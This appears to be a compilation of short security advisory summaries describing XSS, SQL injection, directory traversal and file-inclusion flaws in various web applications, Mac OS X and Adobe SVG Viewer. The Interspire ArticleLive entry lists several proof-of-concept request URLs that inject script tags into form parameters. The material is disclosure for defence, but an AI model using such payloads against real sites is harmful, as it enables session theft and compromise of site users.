The $DEFAULT_SKIN variable is not sanitized. When register_globals=on, an attacker can exploit this vulnerability with a simple PHP injection script.
FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. A successful exploit of the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
SimpleCam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. An attacker can exploit this issue by crafting a malicious URL that contains directory traversal characters.
Interspire ArticleLive is reportedly prone to multiple vulnerabilities. These issues may allow a remote attacker to gain administrative access to the application and carry out various cross-site scripting attacks. Interspire ArticleLive 2005 is reportedly affected by these issues. An attacker can exploit these issues by sending maliciously crafted requests to the vulnerable application. Examples of such requests include:
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</script>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
Apple Mac OS X is prone to a directory-traversal vulnerability. Since the software fails to sufficiently sanitize input, a remote attacker could use the Bluetooth file- and object-exchange services to access files outside the default file-exchange directory.
The Adobe SVG Viewer ActiveX control is prone to an information disclosure vulnerability. Reports indicate that the Adobe SVG Viewer ActiveX control may be employed to disclose the existence of a target file. Information that is harvested by leveraging this vulnerability may be used to aid in further attacks.
ASP Inline Corporate Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Gossamer Threads Links is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
WebCrossing is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
SitePanel2 is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. Multiple cross-site scripting issues affect the application. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. SitePanel2 is prone to a directory traversal vulnerability. This vulnerability could be exploited to retrieve sensitive or privileged information normally accessible to the Web server. The application is also vulnerable to file include, upload and deletion vulnerabilities. These issues could permit the execution of arbitrary code in the context of the affected Web site or the deletion of arbitrary files accessible to the application.